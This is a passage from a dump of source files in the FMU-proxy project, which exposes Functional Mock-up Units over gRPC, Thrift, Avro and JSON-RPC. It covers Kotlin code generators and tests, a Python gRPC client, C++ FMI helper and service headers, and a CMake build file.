(${getProtoType(it)}Read);\n\n rpc Write_${convertName(it.name)} (Instance${getProtoType(it)}Write) returns (StatusResponse);\n \"\"\")\n\n }\n\n })\n }.toString()\n\n FileFuture(\n name = \"unique_service.proto\",\n text = JtwigTemplate.classpathTemplate(\"templates/proto/unique_service.proto\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"fmuName\", modelDescription.modelName)\n .with(\"instanceServices\", instanceServices))\n }\n ).create(File(baseFile, \"${PROTO_SRC_OUTPUT_FOLDER}\"))\n\n }\n\n private fun convertName(str: String) =\n str.substring(0, 1)\n .toUpperCase() + str.substring(1)\n .replace(\".\", \"_\")\n}\n" }, { "alpha_fraction": 0.670735239982605, "alphanum_fraction": 0.6814879179000854, "avg_line_length": 31.78095245361328, "blob_id": "866d67e505d01fbd7d3bdca37ef6c9a16b81eddc", "content_id": "ef8bb63d14b2fd3c7c235329abc9a8e76c3618cf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 3441, "license_type": "permissive", "max_line_length": 89, "num_lines": 105, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/jsonrpc/TestJsonRpcClients.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.jsonrpc\n\nimport info.laht.yajrpc.RpcHandler\nimport info.laht.yajrpc.net.http.RpcHttpClient\nimport info.laht.yajrpc.net.tcp.RpcTcpClient\nimport info.laht.yajrpc.net.ws.RpcWebSocketClient\nimport info.laht.yajrpc.net.zmq.RpcZmqClient\nimport no.mechatronics.sfi.fmi4j.common.FmiStatus\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.FmuProxy\nimport no.mechatronics.sfi.fmuproxy.FmuProxyBuilder\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.jsonrpc.service.RpcFmuService\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.junit.jupiter.api.condition.EnabledIfEnvironmentVariable\nimport org.junit.jupiter.api.condition.EnabledOnOs\nimport org.junit.jupiter.api.condition.OS\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@EnabledOnOs(OS.WINDOWS)\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\n@EnabledIfEnvironmentVariable(named = \"TEST_FMUs\", matches = \".*\")\nclass TestJsonRpcClients {\n\n companion object {\n\n val LOG: Logger = LoggerFactory.getLogger(TestJsonRpcClients::class.java)\n\n private const val wsPort = 8001\n private const val tcpPort = 8002\n private const val zmqPort = 8003\n private const val httpPort = 8004\n\n }\n\n private val fmu: Fmu\n private var proxy: FmuProxy\n private var modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/win64/FMUSDK/2.0.4/BouncingBall/bouncingBall.fmu\"))\n modelDescription = fmu.modelDescription\n\n val handler = RpcHandler(RpcFmuService(fmu))\n proxy = FmuProxyBuilder(fmu).apply {\n addServer(FmuProxyJsonHttpServer(handler), httpPort)\n addServer(FmuProxyJsonWsServer(handler), wsPort)\n addServer(FmuProxyJsonTcpServer(handler), tcpPort)\n addServer(FmuProxyJsonZmqServer(handler), zmqPort)\n }.build().also { it.start() }\n\n }\n\n @AfterAll\n fun tearDown() {\n proxy.stop()\n fmu.close()\n }\n\n @Test\n fun testClients() {\n\n val clients = listOf(\n RpcWebSocketClient(\"localhost\", wsPort),\n RpcTcpClient(\"localhost\", tcpPort),\n RpcHttpClient(\"localhost\", httpPort),\n RpcZmqClient(\"localhost\", zmqPort)\n ).map { JsonRpcFmuClient(it) }\n\n clients.forEach { client ->\n\n LOG.info(\"Testing client of type ${client.client.javaClass.simpleName}\")\n Assertions.assertEquals(modelDescription.modelName, client.modelName)\n Assertions.assertEquals(modelDescription.guid, client.guid)\n\n client.newInstance().use { instance ->\n\n instance.init()\n Assertions.assertEquals(FmiStatus.OK, instance.lastStatus)\n\n val h = client.modelDescription.modelVariables\n .getByName(\"h\").asRealVariable()\n\n val dt = 1.0/100\n val stop = 100.0\n runInstance(instance, dt, stop, {\n h.read()\n }).also { LOG.info(\"Duration: ${it}ms\") }\n\n }\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.6969411969184875, "alphanum_fraction": 0.7016470432281494, "avg_line_length": 31.707693099975586, "blob_id": "861adcfb35390699e8303aa7d8420e173cc52e48", "content_id": "f73734c86f13c86a4ba937290f67b39c9d636df5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2125, "license_type": "permissive", "max_line_length": 88, "num_lines": 65, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/resources/templates/server/Main.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.util.Scanner\nimport no.mechatronics.sfi.fmuproxy.cli.CommandLineParser\nimport no.mechatronics.sfi.fmuproxy.grpc.GrpcFmuServer\nimport no.mechatronics.sfi.fmuproxy.grpc.{{fmuName}}Service\n\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject Main {\n\n private val LOG: Logger = LoggerFactory.getLogger(Main::class.java)\n\n @JvmStatic\n fun main(args: Array<String>) {\n\n val url = Main::class.java.classLoader.getResource(\"{{fmuName}}.fmu\")!!\n\n val _args = args + arrayOf(\"-fmu\", \"$url\")\n CommandLineParser.parse(_args)?.also { proxy ->\n\n proxy.getServer(GrpcFmuServer::class.java)?.addService({{fmuName}}Service())\n proxy.start()\n\n println(\"Press any key to exit..\")\n if (Scanner(System.`in`).hasNext()) {\n println(\"Exiting..\")\n }\n\n proxy.stop()\n\n }\n\n }\n\n}" }, { "alpha_fraction": 0.6552325487136841, "alphanum_fraction": 0.6589147448539734, "avg_line_length": 32.67320251464844, "blob_id": "5e15f25390d923f9f7bbeda5f5db0afcbef0693b", "content_id": "2f978ac24a1b789f84ba2ca6717987b7eb0f91c6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 5160, "license_type": "permissive", "max_line_length": 81, "num_lines": 153, "path": "/python/grpc-client/client.py", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "import grpc\nfrom google.protobuf.empty_pb2 import Empty\nfrom definitions_pb2 import UInt\nfrom definitions_pb2 import InitRequest\nfrom definitions_pb2 import StepRequest\nfrom definitions_pb2 import ReadRequest\nfrom definitions_pb2 import IntRead\nfrom definitions_pb2 import RealRead\nfrom definitions_pb2 import StrRead\nfrom definitions_pb2 import BoolRead\nfrom definitions_pb2 import WriteIntRequest\nfrom definitions_pb2 import WriteRealRequest\nfrom definitions_pb2 import WriteStrRequest\nfrom definitions_pb2 import WriteBoolRequest\nfrom definitions_pb2 import Status\nfrom service_pb2_grpc import FmuServiceStub\n\n\nclass VariableReader:\n\n def __init__(self, fmu_id, value_reference, stub):\n self.stub = stub\n self.request = ReadRequest()\n self.request.fmu_id = fmu_id\n self.request.value_reference = value_reference\n\n def read_int(self) -> IntRead:\n return self.stub.ReadInteger(self.request)\n\n def read_real(self) -> RealRead:\n return self.stub.ReadReal(self.request)\n\n def read_string(self) -> StrRead:\n return self.stub.ReadString(self.request)\n\n def read_boolean(self) -> BoolRead:\n return self.stub.ReadBoolean(self.request)\n\n\nclass VariableWriter:\n\n def __init__(self, fmu_id, value_reference, stub):\n self.stub = stub\n self.fmu_id = fmu_id\n self.value_reference = value_reference\n\n def write_int(self, value: int):\n request = WriteIntRequest()\n request.fmu_id = self.fmu_id\n request.value_reference = self.value_reference\n request.value = value\n return self.stub.WriteInt(request)\n\n def write_real(self, value: float):\n request = WriteRealRequest()\n request.fmu_id = self.fmu_id\n request.value_reference = self.value_reference\n request.value = value\n return self.stub.WriteReal(request)\n\n def write_string(self, value: str):\n request = WriteStrRequest()\n request.fmu_id = self.fmu_id\n request.value_reference = self.value_reference\n request.value = value\n return self.stub.WriteString(request)\n\n def write_boolean(self, value: bool):\n request = WriteBoolRequest()\n request.fmu_id = self.fmu_id\n request.value_reference = self.value_reference\n request.value = value\n return self.stub.WriteBoolean(request)\n\n\nclass FmuInstance:\n\n def __init__(self, stub: FmuServiceStub, model_description, integrator=None):\n self.stub = stub\n self.model_description = model_description\n\n if integrator is None:\n self.fmu_id = self.stub.CreateInstanceFromCS(Empty()).value\n else:\n self.fmu_id = self.stub.CreateInstanceFromME(integrator).value\n\n self.model_variables = dict()\n for v in self.model_description.model_variables:\n self.model_variables[v.value_reference] = v\n\n def get_current_time(self) -> float:\n ref = UInt()\n ref.value = self.fmu_id\n return self.stub.GetCurrentTime(ref).value\n\n def init(self, start=0.0, stop=0.0) -> bool:\n request = InitRequest()\n request.fmu_id = self.fmu_id\n request.start = start\n request.stop = stop\n return self.stub.Init(request)\n\n def step(self, step_size) -> Status:\n request = StepRequest()\n request.fmu_id = self.fmu_id\n request.step_size = step_size\n return self.stub.Step(request)\n\n def terminate(self) -> bool:\n request = UInt()\n request.value = self.fmu_id\n return self.stub.Terminate(request)\n\n def reset(self) -> Status:\n request = UInt()\n request.value = self.fmu_id\n self.stub.Reset(request)\n\n def get_reader(self, identifier) -> VariableReader:\n if isinstance(identifier, int):\n return VariableReader(self.fmu_id, identifier, self.stub)\n elif isinstance(identifier, str):\n value_reference = self.get_value_reference(identifier)\n return VariableReader(self.fmu_id, value_reference, self.stub)\n else:\n raise ValueError('not a valid identifier: ' + identifier)\n\n def get_writer(self, identifier) -> VariableWriter:\n if isinstance(identifier, int):\n return VariableWriter(self.fmu_id, identifier)\n elif isinstance(identifier, str):\n value_reference = self.get_value_reference(identifier)\n return VariableWriter(self.fmu_id, value_reference)\n else:\n raise ValueError('not a valid identifier: ' + identifier)\n\n def get_value_reference(self, var_name) -> int:\n for key in self.model_variables:\n if self.model_variables[key].name == var_name:\n return key\n return None\n\n\nclass FmuClient:\n\n def __init__(self, host_address, port):\n self._channel = grpc.insecure_channel(host_address + ':' + str(port))\n self._stub = FmuServiceStub(self._channel)\n\n self.model_description = self._stub.GetModelDescription(Empty())\n\n def create_instance(self, integrator=None) -> FmuInstance:\n return FmuInstance(self._stub, self.model_description, integrator)\n\n\n\n\n\n\n\n\n" }, { "alpha_fraction": 0.6616889834403992, "alphanum_fraction": 0.6714727282524109, "avg_line_length": 25.98611068725586, "blob_id": "fb1da3b7fb89a35599ecc4b18fa250cd931ab0f6", "content_id": "86924b6638e1046606124892bdff63103088b55a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 1942, "license_type": "permissive", "max_line_length": 104, "num_lines": 72, "path": "/java/FMU-proxy/fmu-proxy/src/test/kotlin/no/mechatronics/sfi/fmuproxy/avro/TestAvroTorsionBar.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "package no.mechatronics.sfi.fmuproxy.avro\n\nimport no.mechatronics.sfi.fmi4j.fmu.Fmu\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmuproxy.TestUtils\nimport no.mechatronics.sfi.fmuproxy.runInstance\nimport org.junit.jupiter.api.AfterAll\nimport org.junit.jupiter.api.Assertions\nimport org.junit.jupiter.api.Test\nimport org.junit.jupiter.api.TestInstance\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n@TestInstance(TestInstance.Lifecycle.PER_CLASS)\nclass TestAvroTorsionBar {\n\n companion object {\n private val LOG: Logger = LoggerFactory.getLogger(TestAvroTorsionBar::class.java)\n }\n\n private val fmu: Fmu\n private val server: AvroFmuServer\n private val client: AvroFmuClient\n private val modelDescription: CommonModelDescription\n\n init {\n\n fmu = Fmu.from(File(TestUtils.getTEST_FMUs(),\n \"FMI_2.0/CoSimulation/${TestUtils.getOs()}/20sim/4.6.4.8004/TorsionBar/TorsionBar.fmu\"))\n modelDescription = fmu.modelDescription\n\n server = AvroFmuServer(fmu)\n val port = server.start()\n\n client = AvroFmuClient(\"localhost\", port)\n\n }\n\n @AfterAll\n fun tearDown() {\n client.close()\n server.close()\n fmu.close()\n }\n\n @Test\n fun testGuid() {\n val guid = client.modelDescription.guid.also { LOG.info(\"guid=$it\") }\n Assertions.assertEquals(modelDescription.guid, guid)\n }\n\n @Test\n fun testModelName() {\n val modelName = client.modelDescription.modelName.also { LOG.info(\"modelName=$it\") }\n Assertions.assertEquals(modelDescription.modelName, modelName)\n }\n\n @Test\n fun testInstance() {\n\n client.newInstance().use { instance ->\n val dt = 1E-3\n val stop = 2.0\n runInstance(instance, dt, stop).also {\n LOG.info(\"Duration=${it}ms\")\n }\n }\n\n }\n\n}" }, { "alpha_fraction": 0.6842105388641357, "alphanum_fraction": 0.6902370452880859, "avg_line_length": 34.57143020629883, "blob_id": "4dfe096cbf2a6a07cb922ac03834d5eddc0e829d", "content_id": "df56ee1981a18b7e43790757ca723644b5deb5fd", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 2489, "license_type": "permissive", "max_line_length": 113, "num_lines": 70, "path": "/cpp/FMU-proxy/common/FmuHelper.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\n#ifndef FMU_PROXY_FMUHELPER_H\n#define FMU_PROXY_FMUHELPER_H\n\n#endif //FMU_PROXY_FMUHELPER_H\n\n#include <fmilib.h>\n#include \"thrift-gen/definitions_types.h\"\n\nusing namespace std;\n\nnamespace fmuproxy {\n\n void import_logger(jm_callbacks *c, jm_string module, jm_log_level_enu_t log_level, jm_string message) {\n printf(\"module = %s, log level = %s: %s\\n\", module, jm_log_level_to_string(log_level), message);\n }\n\n\n jm_callbacks create_callbacks(jm_log_level_enu_t log_level = jm_log_level_debug) {\n jm_callbacks callbacks;\n callbacks.malloc = std::malloc;\n callbacks.calloc = std::calloc;\n callbacks.realloc = std::realloc;\n callbacks.free = std::free;\n callbacks.logger = import_logger;\n callbacks.log_level = log_level;\n callbacks.context = nullptr;\n return callbacks;\n }\n\n fmi2_import_t *load_model_description(const char *tmp_path, fmi_xml_context_t *ctx, jm_callbacks callbacks) {\n\n fmi2_import_t *xml = fmi2_import_parse_xml(ctx, tmp_path, nullptr);\n\n if (!xml) {\n __throw_runtime_error(\"Error parsing XML, exiting\");\n }\n\n if (fmi2_import_get_fmu_kind(xml) == fmi2_fmu_kind_me) {\n __throw_runtime_error(\"Only CS 2.0 is supported by this code\");\n }\n\n return xml;\n\n }\n \n}" }, { "alpha_fraction": 0.7386621236801147, "alphanum_fraction": 0.7414966225624084, "avg_line_length": 33.52941131591797, "blob_id": "3bcb6ceefec3e9f1a1bdf806a36b9d1389d23887", "content_id": "d6860831dab4eb31ebf5c5a87d0fdcecb01b0d46", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "CMake", "length_bytes": 1764, "license_type": "permissive", "max_line_length": 56, "num_lines": 51, "path": "/cpp/FMU-proxy/CMakeLists.txt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "cmake_minimum_required(VERSION 3.10)\nproject(FMU-proxy)\n\nset(CMAKE_CXX_STANDARD 17)\n\nadd_executable(FmuTest\n common/thrift-gen/definitions_types.cpp\n common/thrift-gen/definitions_types.h\n common/thrift-gen/service_types.h\n common/FmuWrapper.cpp\n common/FmuWrapper.h\n test/FmuTest.cpp)\ntarget_link_libraries(FmuTest fmilib)\ntarget_link_libraries(FmuTest boost_system)\ntarget_link_libraries(FmuTest boost_filesystem)\ntarget_link_libraries(FmuTest dl)\n\n\nadd_executable(ThriftServerTest\n common/thrift-gen/definitions_types.cpp\n common/thrift-gen/definitions_types.h\n common/thrift-gen/service_types.h\n common/thrift-gen/FmuService.cpp\n common/thrift-gen/FmuService.h\n common/ThriftHelper.h\n common/FmuWrapper.cpp\n common/FmuWrapper.h\n common/FmuHelper.h\n server/FmuServiceHandler.h\n server/FmuServiceHandler.cpp\n server/ThriftServer.h\n server/ThriftServer.cpp\n test/ThriftServerTest.cpp)\ntarget_link_libraries(ThriftServerTest thrift)\ntarget_link_libraries(ThriftServerTest fmilib)\ntarget_link_libraries(ThriftServerTest pthread)\ntarget_link_libraries(ThriftServerTest boost_system)\ntarget_link_libraries(ThriftServerTest boost_filesystem)\ntarget_link_libraries(ThriftServerTest dl)\n\nadd_executable(ThriftClientTest\n common/thrift-gen/definitions_types.cpp\n common/thrift-gen/definitions_types.h\n common/thrift-gen/service_types.h\n common/thrift-gen/FmuService.cpp\n common/thrift-gen/FmuService.h\n client/ThriftClient.cpp\n client/ThriftClient.h\n test/ThriftClientTest.cpp)\ntarget_link_libraries(ThriftClientTest thrift)\ntarget_link_libraries(ThriftClientTest fmilib)\n\n\n\n" }, { "alpha_fraction": 0.6906585097312927, "alphanum_fraction": 0.6931087374687195, "avg_line_length": 35.685394287109375, "blob_id": "37eae52b9bbf2b34458eebf1e818094c24201ecd", "content_id": "655b36e9bdb13bc06e1180ad0e8967ec1bb79e9e", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "C++", "length_bytes": 3265, "license_type": "permissive", "max_line_length": 125, "num_lines": 89, "path": "/cpp/FMU-proxy/server/FmuServiceHandler.h", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "//\n// Created by laht on 07.06.18.\n//\n\n#ifndef FMU_PROXY_FMUSERVICEHANDLER_H\n#define FMU_PROXY_FMUSERVICEHANDLER_H\n\n#include <iostream>\n\n#include \"../common/thrift-gen/FmuService.h\"\n#include \"../common/FmuWrapper.h\"\n\n\nusing namespace std;\nusing namespace ::fmuproxy::thrift;\n\n\nnamespace fmuproxy {\n namespace server {\n\n class FmuServiceHandler : virtual public FmuServiceIf {\n\n private:\n shared_ptr<FmuWrapper> fmu;\n map<FmuId, shared_ptr<FmuInstance>> fmus;\n\n public:\n FmuServiceHandler(shared_ptr<FmuWrapper> fmu);\n\n void getModelDescriptionXml(std::string &_return) override;\n\n void getModelDescription(ModelDescription &_return) override;\n\n FmuId createInstanceFromCS() override;\n\n FmuId createInstanceFromME(const Solver &solver) override;\n\n bool canGetAndSetFMUstate(const FmuId fmu_id) override;\n\n double getCurrentTime(const FmuId fmu_id) override;\n\n bool isTerminated(const FmuId fmu_id) override;\n\n Status::type init(const FmuId fmu_id, const double start, const double stop) override;\n\n void step(StepResult &_return, const FmuId fmu_id, const double step_size) override;\n\n Status::type terminate(const FmuId fmu_id) override;\n\n Status::type reset(const FmuId fmu_id) override;\n\n void readInteger(IntegerRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadInteger(IntegerArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n void readReal(RealRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadReal(RealArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n void readString(StringRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadString(StringArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n void readBoolean(BooleanRead &_return, const FmuId fmu_id, const ValueReference vr) override;\n\n void bulkReadBoolean(BooleanArrayRead &_return, const FmuId fmu_id, const ValueReferences &vr) override;\n\n Status::type writeInteger(const FmuId fmu_id, const ValueReference vr, const int32_t value) override;\n\n Status::type bulkWriteInteger(const FmuId fmu_id, const ValueReferences &vr, const IntArray &value) override;\n\n Status::type writeReal(const FmuId fmu_id, const ValueReference vr, const double value) override;\n\n Status::type bulkWriteReal(const FmuId fmu_id, const ValueReferences &vr, const RealArray &value) override;\n\n Status::type writeString(const FmuId fmu_id, const ValueReference vr, const std::string &value) override;\n\n Status::type bulkWriteString(const FmuId fmu_id, const ValueReferences &vr, const StringArray &value) override;\n\n Status::type writeBoolean(const FmuId fmu_id, const ValueReference vr, const bool value) override;\n\n Status::type bulkWriteBoolean(const FmuId fmu_id, const ValueReferences &vr, const BooleanArray &value) override;\n\n };\n\n }\n}\n\n#endif //FMU_PROXY_FMUSERVICEHANDLER_H\n" }, { "alpha_fraction": 0.6199377179145813, "alphanum_fraction": 0.6236760020256042, "avg_line_length": 38.79338836669922, "blob_id": "5d69c515a44d98a1627d5f99d7b89ecd5585399a", "content_id": "2ebcf6842f7ff5b1ae10b4fdc142ca11616c3967", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 4815, "license_type": "permissive", "max_line_length": 120, "num_lines": 121, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/codegen/ServerGen.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy.codegen\n\nimport no.mechatronics.sfi.fmi4j.modeldescription.CommonModelDescription\nimport no.mechatronics.sfi.fmi4j.modeldescription.variables.*\nimport no.mechatronics.sfi.fmuproxy.KOTLIN_SRC_OUTPUT_FOLDER\nimport no.mechatronics.sfi.fmuproxy.PACKAGE_NAME\nimport no.mechatronics.sfi.fmuproxy.utils.FileFuture\nimport no.mechatronics.sfi.fmuproxy.utils.getProtoType\nimport no.mechatronics.sfi.fmuproxy.utils.isArray\nimport org.jtwig.JtwigModel\nimport org.jtwig.JtwigTemplate\nimport org.slf4j.Logger\nimport org.slf4j.LoggerFactory\nimport java.io.File\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nprivate val TypedScalarVariable<*>.typeName: String\n get() = when(this) {\n is IntegerVariable -> INTEGER_TYPE\n is RealVariable -> REAL_TYPE\n is StringVariable -> STRING_TYPE\n is BooleanVariable -> BOOLEAN_TYPE\n is EnumerationVariable -> ENUMERATION_TYPE\n else -> throw IllegalStateException(\"$this is not a valid variable type..\")\n }\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject ServerGen {\n\n private val LOG: Logger = LoggerFactory.getLogger(ServerGen::class.java)\n\n fun generateServerCode(modelDescription: CommonModelDescription, baseFile: File) {\n\n val packageName = PACKAGE_NAME.replace(\".\", \"/\")\n val ktOut = File(baseFile, \"${KOTLIN_SRC_OUTPUT_FOLDER}/$packageName\")\n\n val dynamicMethods = StringBuilder().apply {\n modelDescription.modelVariables.forEach {\n\n if (!isArray(it.name)) {\n\n append(JtwigTemplate.classpathTemplate(\"templates/server/Read.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"valueReference\", it.valueReference)\n .with(\"varName\", convertName2(it.name))\n .with(\"typeName\", it.typeName)\n .with(\"returnType\", \"${getProtoType(it)}Read\"))!!\n }).append(\"\\n\")\n\n append(JtwigTemplate.classpathTemplate(\"templates/server/Write.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"valueReference\", it.valueReference)\n .with(\"varName\", convertName2(it.name))\n .with(\"typeName\", it.typeName)\n .with(\"dataType\", getProtoType(it)))!!\n })\n\n }\n\n }\n }\n\n FileFuture(\n name = \"Main.kt\",\n text = JtwigTemplate.classpathTemplate(\"templates/server/Main.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"fmuName\", modelDescription.modelName))!!\n }\n ).create(ktOut)\n\n FileFuture(\n name = \"${modelDescription.modelName}Service.kt\",\n text = JtwigTemplate.classpathTemplate(\"templates/server/Service.kt\").let { template ->\n template.render(JtwigModel.newModel()\n .with(\"fmuName\", modelDescription.modelName)\n .with(\"dynamicMethods\", dynamicMethods))!!\n }\n ).create(ktOut)\n\n }\n\n private fun convertName2(str: String): String {\n val split = str.replace(\"_\".toRegex(), \".\").split(\"\\\\.\".toRegex()).dropLastWhile { it.isEmpty() }.toTypedArray()\n return StringBuilder().apply {\n for (s in split) {\n append(s.substring(0, 1).toUpperCase()).append(s.substring(1))\n }\n }.toString()\n }\n\n}\n" }, { "alpha_fraction": 0.7087666988372803, "alphanum_fraction": 0.7127290964126587, "avg_line_length": 32.61666488647461, "blob_id": "235526cbcee62a8d7671aee915867d98e74dca42", "content_id": "5a4102713ad97c48a8e0b91c2314c97902f714f6", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Kotlin", "length_bytes": 2019, "license_type": "permissive", "max_line_length": 125, "num_lines": 60, "path": "/java/FMU-proxy/fmu-proxy-gen/src/main/kotlin/no/mechatronics/sfi/fmuproxy/ApplicationStarter.kt", "repo_name": "johanrhodin/FMU-proxy", "src_encoding": "UTF-8", "text": "/*\n * The MIT License\n *\n * Copyright 2017-2018 Norwegian University of Technology\n *\n * Permission is hereby granted, free of charge, to any person obtaining a copy\n * of this software and associated documentation files (the \"Software\"), to deal\n * in the Software without restriction, including without limitation the rights\n * to use, copy, modify, merge, publish, distribute, sublicense, and/or sell\n * copies of the Software, and to permit persons to whom the Software is\n * furnished to do so, subject to the following conditions:\n *\n * The above copyright notice and this permission notice shall be included in\n * all copies or substantial portions of the Software.\n *\n * THE SOFTWARE IS PROVIDED \"AS IS\", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR\n * IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,\n * FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE\n * AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER\n * LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,\n * OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN\n * THE SOFTWARE.\n */\n\npackage no.mechatronics.sfi.fmuproxy\n\nimport picocli.CommandLine\nimport java.io.File\n\n/**\n *\n * @author Lars Ivar Hatledal\n */\nobject ApplicationStarter {\n\n @JvmStatic\n fun main(args: Array<String>) {\n CommandLine.run(Args(), System.out, *args)\n }\n\n}\n\[email protected](name = \"fmu-proxy-gen\")\nclass Args: Runnable {\n\n 